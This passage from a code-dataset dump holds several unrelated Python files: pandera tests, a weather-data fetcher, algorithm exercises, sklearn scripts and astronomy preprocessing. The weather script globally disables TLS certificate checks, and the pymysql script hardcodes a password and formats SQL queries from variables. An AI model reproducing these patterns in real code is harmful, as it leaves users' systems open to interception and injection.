@pa.check(\"a\")\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n # pylint:disable=no-self-argument\n assert cls is Schema\n return series < 100\n\n df = pd.DataFrame({\"a\": [101]})\n schema = Schema.to_schema()\n err_msg = r\"Column\\s*a\\s*int_column_lt_100\\s*\\[101\\]\\s*1\"\n with pytest.raises(pa.errors.SchemaErrors, match=err_msg):\n schema.validate(df, lazy=True)\n\n\ndef test_check_single_index():\n \"\"\"Test the behaviour of a check on a single index.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Index[str]\n\n @pa.check(\"a\")\n def not_dog(cls, idx: pd.Index) -> Iterable[bool]:\n # pylint:disable=no-self-argument\n assert cls is Schema\n return ~idx.str.contains(\"dog\")\n\n df = pd.DataFrame(index=[\"cat\", \"dog\"])\n err_msg = r\"Index\\s*\\s*not_dog\\s*\\[dog\\]\\s*\"\n with pytest.raises(pa.errors.SchemaErrors, match=err_msg):\n Schema.validate(df, lazy=True)\n\n\ndef test_field_and_check():\n \"\"\"Test the combination of a field and a check on the same column.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int] = pa.Field(eq=1)\n\n @pa.check(\"a\")\n @classmethod\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n return series < 100\n\n schema = Schema.to_schema()\n assert len(schema.columns[\"a\"].checks) == 2\n\n\ndef test_check_non_existing():\n \"\"\"Test a check on a non-existing column.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int]\n\n @pa.check(\"nope\")\n @classmethod\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n return series < 100\n\n err_msg = (\n \"Check int_column_lt_100 is assigned to a non-existing field 'nope'\"\n )\n with pytest.raises(pa.errors.SchemaInitError, match=err_msg):\n Schema.to_schema()\n\n\ndef test_multiple_checks():\n \"\"\"Test multiple checks on the same column.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int]\n\n @pa.check(\"a\")\n @classmethod\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n return series < 100\n\n @pa.check(\"a\")\n @classmethod\n def int_column_gt_0(cls, series: pd.Series) -> Iterable[bool]:\n return series > 0\n\n schema = Schema.to_schema()\n assert len(schema.columns[\"a\"].checks) == 2\n\n df = pd.DataFrame({\"a\": [0]})\n err_msg = r\"Column\\s*a\\s*int_column_gt_0\\s*\\[0\\]\\s*1\"\n with pytest.raises(pa.errors.SchemaErrors, match=err_msg):\n schema.validate(df, lazy=True)\n\n df = pd.DataFrame({\"a\": [101]})\n err_msg = r\"Column\\s*a\\s*int_column_lt_100\\s*\\[101\\]\\s*1\"\n with pytest.raises(pa.errors.SchemaErrors, match=err_msg):\n schema.validate(df, lazy=True)\n\n\ndef test_check_multiple_columns():\n \"\"\"Test a single check decorator targeting multiple columns.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int]\n b: Series[int]\n\n @pa.check(\"a\", \"b\")\n @classmethod\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n return series < 100\n\n df = pd.DataFrame({\"a\": [101], \"b\": [200]})\n with pytest.raises(\n pa.errors.SchemaErrors, match=\"2 schema errors were found\"\n ):\n Schema.validate(df, lazy=True)\n\n\ndef test_check_regex():\n \"\"\"Test the regex argument of the check decorator.\"\"\"\n\n class Schema(pa.SchemaModel):\n a: Series[int]\n abc: Series[int]\n cba: Series[int]\n\n @pa.check(\"^a\", regex=True)\n @classmethod\n def int_column_lt_100(cls, series: pd.Series) -> Iterable[bool]:\n return series < 100\n\n df = pd.DataFrame({\"a\": [101], \"abc\": [1], \"cba\": [200]})\n with pytest.raises(\n pa.errors.SchemaErrors, match=\"1 schema errors were found\"\n ):\n Schema.validate(df, lazy=True)\n\n\ndef test_inherit_schemamodel_fields():\n \"\"\"Test that columns and indices are inherited.\"\"\"\n\n class Base(pa.SchemaModel):\n a: Series[int]\n idx: Index[str]\n\n class Mid(Base):\n b: Series[str]\n idx: Index[str]\n\n class Child(Mid):\n b: Series[int]\n\n expected = pa.DataFrameSchema(\n columns={\"a\": pa.Column(int), \"b\": pa.Column(int)},\n index=pa.Index(str),\n )\n\n assert expected == Child.to_schema()\n\n\ndef test_inherit_field_checks():\n \"\"\"Test that checks are inherited and overridden.\"\"\"\n\n class Base(pa.SchemaModel):\n a: Series[int]\n abc: Series[int]\n\n @pa.check(\"^a\", regex=True)\n @classmethod\n def a_max(cls, series: pd.Series) -> Iterable[bool]:\n return series < 100\n\n @pa.check(\"a\")\n @classmethod\n def a_min(cls, series: pd.Series) -> Iterable[bool]:\n return series > 1\n\n class Child(Base):\n @pa.check(\"a\")\n @classmethod\n def a_max(cls, series: pd.Series) -> Iterable[bool]:\n return series < 10\n\n schema = Child.to_schema()\n assert len(schema.columns[\"a\"].checks) == 2\n assert len(schema.columns[\"abc\"].checks) == 0\n\n df = pd.DataFrame({\"a\": [15], \"abc\": [100]})\n err_msg = r\"Column\\s*a\\s*a_max\\s*\\[15\\]\\s*1\"\n with pytest.raises(pa.errors.SchemaErrors, match=err_msg):\n schema.validate(df, lazy=True)\n\n\ndef test_dataframe_check():\n \"\"\"Test dataframe checks.\"\"\"\n\n class Base(pa.SchemaModel):\n a: Series[int]\n b: Series[int]\n\n @pa.dataframe_check\n @classmethod\n def value_max(cls, df: pd.DataFrame) -> Iterable[bool]:\n return df < 200\n\n class Child(Base):\n @pa.dataframe_check()\n @classmethod\n def value_min(cls, df: pd.DataFrame) -> Iterable[bool]:\n return df > 0\n\n @pa.dataframe_check\n @classmethod\n def value_max(cls, df: pd.DataFrame) -> Iterable[bool]:\n return df < 100\n\n schema = Child.to_schema()\n assert len(schema.checks) == 2\n\n df = pd.DataFrame({\"a\": [101, 1], \"b\": [1, 0]})\n with pytest.raises(\n pa.errors.SchemaErrors, match=\"2 schema errors were found\"\n ):\n schema.validate(df, lazy=True)\n\n\ndef test_config():\n \"\"\"Test that Config can be inherited and translate into DataFrameSchema options.\"\"\"\n\n class Base(pa.SchemaModel):\n a: Series[int]\n idx_1: Index[str]\n idx_2: Index[str]\n\n class Config:\n name = \"Base schema\"\n coerce = True\n multiindex_coerce = True\n multiindex_strict = True\n multiindex_name: Optional[str] = \"mi\"\n\n class Child(Base):\n b: Series[int]\n\n class Config:\n name = \"Child schema\"\n strict = True\n multiindex_strict = False\n\n expected = pa.DataFrameSchema(\n columns={\"a\": pa.Column(int), \"b\": pa.Column(int)},\n index=pa.MultiIndex(\n [pa.Index(str, name=\"idx_1\"), pa.Index(str, name=\"idx_2\")],\n coerce=True,\n strict=False,\n name=\"mi\",\n ),\n name=\"Child schema\",\n coerce=True,\n strict=True,\n )\n\n assert expected == Child.to_schema()\n","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":11215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"183057992","text":"class RingBuffer:\n def __init__(self, capacity):\n self.capacity = capacity\n self.current = 0\n self.storage = [None]*capacity\n\n def append(self, item):\n # Set the passed in item to evaluate to the current item in storage.\n self.storage[self.current] = item\n # If the current value is less than the overall capacity.\n if self.current < self.capacity - 1:\n # Add it to the list\n self.current += 1\n else:\n # Otherwise set current value to 0\n self.current = 0\n\n def get(self):\n list = []\n for value in self.storage:\n if value is not None:\n list.append(value)\n return list","sub_path":"ring_buffer/ring_buffer.py","file_name":"ring_buffer.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"390242481","text":"from urllib import request\nfrom datetime import datetime, date\nimport sys\nimport json\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\n###################\n# 2020 thisispoki #\n###################\n# Did I get called by Telegraf, or am I testing?\nif len(sys.argv) == 4:\n cityid = str(sys.argv[1])\n units = str(sys.argv[2])\n appid = str(sys.argv[3])\nelse:\n cityid = '5391959'\n units = 'metric'\n appid = ''\n\n# This function sets the common tags for each line we'll be generating\n# There's a case for lat and lon to be values rather than tags, but it's unclear as to the relative importance of\n# InfluxDB v1.x GROUP BY or Flux geo functions. \ndef getCoreFields(jsonContent, city):\n return ','.join(['weather',\n 'city=' + city,\n 'lat=' + str(jsonContent['lat']),\n 'lon=' + str(jsonContent['lon']),\n 'timezone=' + str(jsonContent['timezone']),\n 'timezone_offset=' + str(jsonContent['timezone_offset']) + 'i'])\n\n# Each line will have a set of common fields\ndef getRepeatedFields(jsonContent):\n return ','.join(['temp=' + str(jsonContent['temp']),\n 'feels_like=' + str(jsonContent['feels_like']),\n 'pressure=' + str(jsonContent['pressure']) + 'i',\n 'humidity=' + str(jsonContent['humidity']) + 'i',\n 'dew_point=' + str(jsonContent['dew_point']),\n 'clouds=' + str(jsonContent['clouds']) + 'i',\n 'wind_speed=' + str(jsonContent['wind_speed']),\n 'wind_deg=' + str(jsonContent['wind_deg']) + 'i',\n 'description=\"' + jsonContent['weather'][0]['description'] + '\"'])\n\n# Date mathematics, to determine the local HH:mm:ss given an epoch timestamp and a timezone offset\ndef getTimeFromDateTimeOffset(rawTime, offset):\n timeEpoch = rawTime + offset\n timeObject = datetime.fromtimestamp(timeEpoch)\n return str(timeObject.hour).zfill(2) + ':' + str(timeObject.minute).zfill(2) + ':' + str(timeObject.second).zfill(2)\n\n################\n# Start of doing things. Start with a call to get the lon, lat & city from the cityid\n################\nthisurl = 'https://api.openweathermap.org/data/2.5/weather?id=' + cityid + '&appid=' + appid\ncontents = request.urlopen(thisurl).read()\njsonContent = json.loads(contents)\nlat = str(jsonContent['coord']['lat'])\nlon = str(jsonContent['coord']['lon'])\ncity = str(jsonContent['name'])\n\n################\n# Now we've built all the URL parameters we'll need, let's make the actual call\n################\ncontents = request.urlopen(\"https://api.openweathermap.org/data/2.5/onecall?lat=\" + lat + \"&lon=\" + lon + \"&exclude=minutely&units=\" + units + \"&appid=\" + appid).read()\njsonContent = json.loads(contents)\n\n# Start building the output. Note that city is a tag, and it might have special characters, so quote them\ncoreoutput = getCoreFields(jsonContent, city.replace(' ', '\\ ').replace(',','\\,'))\n\n#current weather variables\ntimezone_offset = jsonContent['timezone_offset']\ntimestamp = jsonContent['current']['dt'] * 1000000000\nsunrise = getTimeFromDateTimeOffset(jsonContent['current']['sunrise'], timezone_offset)\nsunset = getTimeFromDateTimeOffset(jsonContent['current']['sunset'], timezone_offset)\ntoday = date.fromtimestamp(jsonContent['current']['sunrise'] + timezone_offset)\n\ncurrentLineProtocol = getRepeatedFields(jsonContent['current'])\n\n# Construct the rest of the line protocol for the current weather\noutput = ','.join([coreoutput,\n 'forecast=0h '\n 'today=\"' + str(today) + '\"',\n 'sunrise=\"' + sunrise + '\"',\n 'sunset=\"' + sunset + '\"',\n 'uvi=' + str(jsonContent['current']['uvi']),\n currentLineProtocol + ' ' + str(timestamp)])\n\n# Store the whole line into a list so it can be quickly extracted\noutputlist = [output]\n\n# Loop around all 48 hours of hourly forecasts, joining the fields with the core data we captured earlier\nhourNumber=1\nfor hourly in jsonContent['hourly']:\n #hourly forecast\n output = ','.join([coreoutput,\n 'forecast=' + str(hourNumber) + 'h ' + getRepeatedFields(hourly) + ' ' + str(hourly['dt'] * 1000000000)])\n outputlist.append(output)\n hourNumber += 1\n\n# Loop around all 8 days of daily forecasts, joining the fields with the core data we captured earlier\ndayNumber=0\nfor daily in jsonContent['daily']:\n #Daily forecast\n timestamp = daily['dt'] * 1000000000\n sunrise = getTimeFromDateTimeOffset(daily['sunrise'], timezone_offset)\n sunset = getTimeFromDateTimeOffset(daily['sunset'], timezone_offset)\n today = date.fromtimestamp(daily['sunrise'] + timezone_offset)\n\n # temp and feels_like are JSON objects, containing day, morn, eve, max, night, min, etc.\n # for now, let's just use the 'day' temperatures\n daily['temp'] = daily['temp']['day']\n daily['feels_like'] = daily['feels_like']['day']\n output = ','.join([coreoutput,\n 'today=' + str(today),\n 'sunrise=' + sunrise,\n 'sunset=' + sunset,\n 'uvi=' + str(daily['uvi']),\n 'forecast=' + str(dayNumber) + 'd ' + getRepeatedFields(daily) + ' ' + str(daily['dt'] * 1000000000)])\n outputlist.append(output)\n dayNumber += 1\n\n# Quickly output all the stored lines\nfinalOutput = '\\n'.join(outputlist)\nprint(finalOutput)","sub_path":"local_weather_forecast/onecall.py","file_name":"onecall.py","file_ext":"py","file_size_in_byte":5347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"104189712","text":"class TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nroot = TreeNode(3)\n\np = root.left = TreeNode(5)\nroot.left.left = TreeNode(6)\nroot.left.right = TreeNode(2)\n\nq = root.right = TreeNode(1)\nroot.right.left = TreeNode(0)\nroot.right.right = TreeNode(8)\n\nclass Solution:\n def lowestCommonAncestor(self, root, p, q):\n _stack = []\n recent_popped = None\n _stack_p, _stack_q = [], []\n while root or _stack:\n while root:\n _stack.append(root)\n root = root.left\n cur = _stack[-1]\n if cur.right == None: # 可以立马出栈的情况, 右节点为None,说明p节点没有右子树,此时p可以输出\n if cur == p:\n _stack_p = _stack[:]\n if cur == q:\n _stack_q = _stack[:]\n recent_popped = _stack.pop(-1)\n root = None # 让下次循环,还是从栈里面走\n elif cur.right == recent_popped: # 者右节点就是最近popped的节点,当前节点也可以输出\n if cur == p:\n _stack_p = _stack[:]\n if cur == q:\n _stack_q = _stack[:]\n recent_popped = _stack.pop(-1)\n root = None\n elif cur.right != recent_popped: # cur.right and cur.right != recent_popped: # 右节点不空,此时,p没有左子树,右节点暂时不能输出\n root = cur.right # 继续遍历左子树\n\n ans = None\n while _stack_p and _stack_q: # 将两个栈在一起出栈,遇到第一个不同元素为止\n if _stack_p[0] != _stack_q[0]: # 不相同,没有共同节点\n break\n p = _stack_p.pop(0) # 记录本次出栈元素\n q = _stack_q.pop(0)\n ans = p\n return ans\n\n\n def lowestCommonAncestor1(self, root, p, q):\n queue = [root]\n parent = {root:None} # parent里面存放key的父节点\n while p not in parent or q not in parent: # 直到找到p和q的所有父节点为止\n cur = queue.pop()\n if cur.left:\n parent[cur.left] = cur\n queue.append(cur.left)\n if cur.right:\n parent[cur.right] = cur\n queue.append(cur.right)\n\n ancestors = set()\n while p:\n ancestors.add(p) # 将p的父节点依次加入ancestor集合\n p = parent[p]\n while q not in ancestors: # 如果q不在集合中,则上溯寻找q的父节点,直到在集合中找到,此时这个点就是最近公共节点\n q = parent[q]\n return q # 如果q在集合中,则q就是公共节点\nprint(Solution().lowestCommonAncestor(root,p,q))","sub_path":"二叉树/236. 二叉树的最近公共祖先.py","file_name":"236. 二叉树的最近公共祖先.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"332605976","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 2 15:46:52 2019\n\n@author: Mikko\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 25 17:02:44 2019\n\n@author: Mikko\n\n ## DONE! ##\n\"\"\"\n\nimport sklearn\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.feature_selection import RFECV\nfrom scipy.io import loadmat\nfrom sklearn.metrics import accuracy_score\n\n#X_train, y_train, X_test, y_test = loa\n\nmat = loadmat(\"arcene.mat\")\nX_train = mat[\"X_train\"]\ny_train = mat[\"y_train\"].ravel()\nX_test = mat[\"X_test\"]\ny_test = mat[\"y_test\"].ravel()\n\n\nsolver = sklearn.linear_model.LogisticRegression(solver=\"liblinear\")\nslc = RFECV(estimator=solver, step=50, verbose=1)\nslc.fit(X_train,y_train)\nprint(\"Selectet Features\",np.sum(slc.support_))\n\nprint(\"Optimal number of features : %d\" % slc.n_features_)\n\n\ny_hat = slc.predict(X_test)\naccuracy = accuracy_score(y_test, y_hat)\n\nprint(\"Accuracy is \",accuracy*100,\"%\")\n\n\n# Plot number of features VS. cross-validation scores\nplt.figure()\nplt.xlabel(\"Number of features selected\")\nplt.ylabel(\"Cross validation score (nb of correct classifications)\")\nplt.plot(range(1, len(slc.grid_scores_) + 1), slc.grid_scores_)\nplt.show()\n","sub_path":"exercises/Ex6/EX6_4.py","file_name":"EX6_4.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"486106179","text":"import time\r\nimport sys\r\nimport os\r\n\r\ncwd = os.getcwd()\r\n\r\nfrom mouseAutomater import ImageController\r\nfrom mouseAutomater import MouseAutomater\r\n\r\nlsleep = 0.002\r\nrsleep = 0.025\r\nprint(\"Created by HudZah\\n\\n\\n\")\r\n\r\nimageName = ImageController.getImage()\r\nhandler = ImageController(imageName)\r\nresizeValue = int(input(\"Output pixel size (for square image): \"))\r\noffset = int(input(\"Scale for image (1 for one to one): \"))\r\nresizeValue = resizeValue / offset\r\nhandler.convertToBW()\r\nhandler.resize(resizeValue)\r\n\r\nreturnKey = None\r\nwhile returnKey == None:\r\n MouseAutomater.openPaint()\r\n print(\"Warning: There is no fail-safe other than pulling your mouse to the upper left corner, in case anything goes wrong once you start this program please abort using Ctrl + Alt + Delete \\n\\n\\n\")\r\n print(\"Enter to start 3 second countdown, N to abort, pull to left hand corner to abort once the program starts\")\r\n print(\"Please position your cursor on a canvas on either Paint, Photoshop or any other design software as soon as you start running this. Make sure there is optimal space to completely draw the image.\")\r\n returnKey = input()\r\n returnKey = returnKey.lower()\r\n if returnKey == \"n\":\r\n exit()\r\n \r\ntime.sleep(3)\r\narray = handler.newImageArray()\r\nMouseAutomater.imageToLines(array, offset, rsleep, lsleep)\r\nrepeat = \"y\"\r\nwhile repeat == \"y\":\r\n repeat = input(\"Type 'y' to repeat, or enter to exit\")\r\n repeat = repeat.lower()\r\n if repeat == \"y\":\r\n time.sleep(3)\r\n MouseAutomater.imageToLines(array, offset, rsleep, lsleep)\r\n else:\r\n exit()\r\n\r\n","sub_path":"AutoDrawer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"315411666","text":"# 数据读取及基本处理\nimport pandas as pd\nimport numpy as np\nfrom sklearn import linear_model\nfrom sklearn.model_selection import cross_val_score,KFold,GridSearchCV\nfrom sklearn import metrics\n\n# 读入数据\ndf = pd.read_csv(\"FE_day_T.csv\")\n#print(df.head())\n\n# 数据分离\ny = df['cnt']\nX = df.drop('cnt', axis = 1)\n\nrcv = linear_model.RidgeCV(alphas=np.array([0.01, 0.1, 1, 10, 100]))\n\nresult = {}\nk = []\ndef ridge_score(X,y):\n X = X.values\n y = y.values\n\n # 𝐾折交叉验证数据划分\n fold = KFold(5, shuffle=False) # 切分5部分\n i = 0\n for train_index, test_index in fold.split(X, y):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n\n rcv.fit(X_train, y_train)\n y_pred = rcv.predict(X_test)\n\n result[i] = rcv.coef_\n k.append(metrics.mean_squared_error(y_test, y_pred))\n print(\"RMSE:{0}\".format(metrics.mean_squared_error(y_test, y_pred)))\n i = i + 1\n\n\nridge_score(X, y)\nprint(result[k.index(min(k))])\n","sub_path":"LinearRegression/Ridge.py","file_name":"Ridge.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"240896624","text":"import pymysql\nimport csv\nimport pandas as pd\n\n# 連接資料庫\ndb = pymysql.connect(host='127.0.0.1', port=3306, user='chiouchingyi', passwd='850121', db='tracks')\ncursor = db.cursor()\nprint(\"Opened database successfully\")\n\nuser_id = 'nicole'\nnum = 20\n\nfinal_L = []\n\ndata_folder = \"csv/results/\"\nfilepath = data_folder + user_id+ '.csv'\nprint('路徑:',filepath)\n\ngetrecresult = \"select score from tracks_recfromrlresults where user_id='{}' and number_of_rec_times='{}'\".format(user_id,num)\ndata1 = cursor.execute(getrecresult)\n##print(data1) # 返回為0或者1,1表示有資料,0表示無資料或失敗\nrs1 = cursor.fetchall()\n##print(rs1)\n\nif int(num) > 1:\n action = 'a'\nelse:\n action = 'w'\n\nwith open(filepath, action, newline='') as csvfile:\n writer = csv.writer(csvfile)\n if num == 1:\n writer.writerow(['user_id','number_of_rec_times','s1','s2','s3','s4','s5','s6','s7','s8','s9','s10','s11','s12','s13','s14','s15','s16','s17','s18','s19','s20','avg_score'])\n L = []\n for row in rs1:\n result = row[0]\n L.append(int(result))\n print(num)\n print(L)\n avg_score = sum(L)/len(L) \n print('ID:',user_id,' | ','AVG score:',avg_score)\n\n Table = [[user_id,num,L[0],L[1],L[2],L[3],L[4],L[5],L[6],L[7],L[8],L[9],L[10],L[11],L[12],L[13],L[14],L[15],L[16],L[17],L[18],L[19],avg_score]]\n writer.writerows(Table)\n","sub_path":"RL/getRLRecScore.py","file_name":"getRLRecScore.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"207098833","text":"#! python3\n\n\nimport sys\nimport os\nimport csv\nfrom collections import defaultdict\n# ^dict subclass that calls a factory function to insert 0 for missing values\nimport pandas as pd\n\n\n# =============================================================================\n# START SELECTION GROUP (1)\n# =============================================================================\n\n\ndef file_name():\n while True:\n global fileName # = 0):\n squares.append((i + 2, j - 1))\n if (i - 2 >= 0) & (j + 1 < m):\n squares.append((i - 2, j + 1))\n if (i - 2 >= 0) & (j - 1 >= 0):\n squares.append((i - 2, j - 1))\n if (i + 1 < n) & (j - 2 >= 0):\n squares.append((i + 1, j - 2))\n if (i - 1 >= 0) & (j + 2 < m):\n squares.append((i - 1, j + 2))\n if (i - 1 >= 0) & (j - 2 >= 0):\n squares.append((i - 1, j - 2))\n return squares\n\n\n# Recursively searches for a complete tour from a given square\ndef find_route(square, visited, n, m):\n if len(visited) == n * m:\n return True\n for next in next_square(square, n, m):\n if next not in visited:\n if find_route(next, visited + [next], n, m):\n return True\n return False\n\n\n# Checks if a tour is possible from any square of an nxm board\ndef is_tour(n, m):\n for i in range(n):\n for j in range(m):\n square = (i, j)\n visited = [square]\n if find_route(square, visited, n, m):\n return True\n return False\n","sub_path":"recursive_tour.py","file_name":"recursive_tour.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"89906458","text":"# -*- coding:utf-8 -*-\nfrom __future__ import print_function\nimport os\nimport platform\n\n__ENV_KEYS = ['PATH', 'PYTHONPATH', 'PKG_CONFIG_PATH', 'LD_LIBRARY_PATH']\n\ndef is_windows():\n return platform.system() == \"Windows\"\n \n \ndef is_linux():\n return platform.system() == \"Linux\"\n \n \ndef env_sep():\n return ':' if not is_windows() else ';'\n \n \ndef get_env_dict():\n envs = os.environ\n print(envs)\n d = {}\n sep = env_sep()\n for key in __ENV_KEYS:\n if not key in envs:\n continue\n value = envs[key]\n strs = value.split(sep)\n # filter invalid\n valids = []\n for s in strs:\n s = s.strip()\n if len(s) > 0:\n valids.append(s)\n d[key] = valids\n return d\n \n \ndef print_env_dict(envs):\n for k in envs.keys():\n v = envs[k]\n print('%s\\t\\t%d' % (k, len(v)))\n for s in v:\n print('\\t%s'% (s))\n\n\nif __name__ == '__main__':\n envs = get_env_dict()\n print_env_dict(envs)\n \n","sub_path":"digits/envs.py","file_name":"envs.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"445564333","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass journal_entries_employee(models.Model):\n _name = \"account.move\"\n _inherit = \"account.move\"\n\n \n @api.multi\n @api.depends('line_ids.employee_id')\n def _compute_employee_id(self):\n for move in self:\n employee = move.line_ids.mapped('employee_id')\n move.employee_id = employee.id if len(employee) == 1 else False\n\n\n employee_id = fields.Many2one('hr.employee', compute='_compute_employee_id', string=\"Employee\", store=True, readonly=True)\n\nclass journal_entries_employee_line(models.Model):\n _name = \"account.move.line\"\n _inherit = \"account.move.line\"\n\n employee_id = fields.Many2one('hr.employee', string='Employee', ondelete='restrict')\n\n @api.multi\n @api.onchange('employee_id','partner_id')\n def _onchange_emp_part(self):\n for rec in self:\n if rec.employee_id:\n rec.partner_id = False\n else:\n rec.employee_id = False\n\n","sub_path":"journal_entries_employee/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"290426457","text":"import sys\nn = int(sys.stdin.readline())\na = [0] * 8001\nfor i in range(n):\n p = int(sys.stdin.readline())\n a[p + 4000] += 1\ns = 0 #sum\nc = 0 #center\nl = -1 #lower\nu = 0 #upper\nx = 0 #count\nfor i in range(8001):\n if a[i] > 0:\n s += (i - 4000) * a[i]\n if l == -1:\n l = i\n if u < i:\n u = i\n if x <= n // 2 and x + a[i] > n // 2:\n c = i\n x += a[i]\nprint(round(s / n))\nprint(c - 4000)\nm = max(a) #mode\no = a.index(m) #index of mode\ntry:\n print(a.index(m, o + 1) - 4000)\nexcept:\n print(o - 4000)\nprint(u - l)","sub_path":"source/nojam/2108.py","file_name":"2108.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"453161044","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom astropy.io import fits\n\ndef wave_grid(data, header):\n\t\"\"\"Returns wave grid based on header\"\"\"\n\tcrval1 = header['CRVAL1'] #Starting value\n\tcdelt1 = header['CDELT1'] #Pixel size\n\twavegrid = crval1 + cdelt1 * np.arange(data.shape[1])\n\t\n\treturn crval1, wavegrid\n\t\n\t\ndef spectra_viewer(tmp_data):\n \"\"\"Produces plot of the 2D data\"\"\"\n \n #print(tmp_data.shape)\n tmp_header = data[idx].header\n \n #Create the wavegrid\n crval1, wavegrid = wave_grid(tmp_header, tmp_data)\n \n #Plot\n #plt.subplot(1,2,1)\n plt.imshow(tmp_data, extent = (crval1, wavegrid[-1], tmp_data.shape[0], 0), \\\n cmap = 'gray', aspect = 'auto', vmin = 0, vmax = 1)\n plt.title(\"2D image spectra\")\n plt.grid(False)\n \n \"\"\"plt.subplot(1,2,2)\n plt.imshow(tmp_data, extent = (crval1, wave_grid[-1], tmp_data.shape[0], 0), \\\n cmap = 'gray', aspect = 'auto', vmin = 0, vmax = 1)\n plt.title(\"2D image spectra\")\n plt.xlim(697, 700) #for masknumber = 1624, idx = 98\n plt.grid(False)\"\"\"\n\ndef preprocess_bino(fname_data = \"obj_abs_slits_lin.fits\", fname_err = \"obj_abs_err_slits_lin.fits\",\\\n fname_extr = \"obj_abs_slits_extr.fits\", masknumber = 1624, pos_width = 10): \n \"\"\"\n Based on Jae's original code. Goal is to process binospec data in a way\n such that it can be used to extract 1D spectra. \n \n 1. For a given mask, finds where the galaxies are along the position\n axis. This is required because we extended the slits whenever possible.\n OBPOSVAL from the header tells us where the central points of the \n galaxies per slit are so that we can do extraction only around that \n region.\n \n 2. Extract +/- pos_width pixels around the galaxies for 1D extraction. \n Default set to 10 px.\n \n 3. The native data unit is ergs/cm^2/s/nm. Preprocessor changes this to\n 10^-17 ergs/cm^2/s/Angstrom.\n \n 4. Following conditions imposed -\n Data: \n - If NaN: Data ZERO and Error infinity.\n Error:\n - If NaN: Error infinity and Data ZERO.\n \n Args:\n fname_data: data file name\n fname_err: error file name\n fname_extr: head file name to get OBPOSVAL\n masknumber: mask number\n post_width: amount of pixels to be used for extraction above and \n below a given galaxy\n Returns: \n data_err: A numpy array of shape (Ntargets+1, 2, pos_width, num_cols). \n - Though the native data have different number of rows, we use a single fixed number here.\n - Channel 0: Data\n - Channel 1: Error\n list_headers: List of headers\n\n Note, first spectrum in native data is saved in loc \"1\". We follow the same convention.\n \"\"\"\n \n #read data. 0th element is blank\n data_dir = data_dir = \"../DATA_JULY18/cattarget_\" + str(masknumber) + \"/reduced/\"\n #print(data_dir)\n data = fits.open(data_dir + fname_data)\n err = fits.open(data_dir + fname_err)\n extr = fits.open(data_dir + fname_extr)\n extr = extr[1] #Need only one header to get all the OBPOSVALs\n \n infinity = 1e60\n #unit_conversion = 10**19\n unit_conversion = 1. #for now, keeping it 1.\n\n # ---- Output variables\n data_err = None\n list_headers = [None]\n \n # ---- Place holder for the output array\n Ncols = data[1].data.shape[1]\n data_err = np.zeros((len(data), 2, 2*pos_width+1, Ncols))\n data_err[:, 1, :, :] = infinity # All data/errors are initially set to zero and infinity.\n\n for idx in range(1, len(data)):\n #for idx in range(98, 99):\n #Find the centroid along yaxis\n obpos = 'OBPOS' + str(idx)\n obposval = extr.header[obpos]\n obposval = int(obposval) #need to convert to int for slicing\n #print(f\"idx: {idx}\")\n # ---- Import data and unit conversion\n data_tmp = data[idx].data * unit_conversion\n err_tmp = err[idx].data * unit_conversion\n #print(data_tmp.shape)\n #print(data_tmp.shape)\n # ---- Trim the data\n #print(f\"obposval: {obposval}\")\n data_tmp = data_tmp[obposval-pos_width:obposval+pos_width+1]\n err_tmp = err_tmp[obposval-pos_width:obposval+pos_width+1]\n #print(data_tmp.shape)\n \n # ---- Apply preprocessing\n ibool = np.logical_or(np.isnan(err_tmp), np.isnan(data_tmp), err_tmp <=0.)\n data_tmp[ibool] = 0.\n err_tmp[ibool] = infinity\n \n # ---- Save data\n #print(data_err[idx, 0].shape)\n #print(\"------\")\n data_err[idx, 0] = data_tmp\n data_err[idx, 1] = err_tmp\n\n # ---- Save header\n 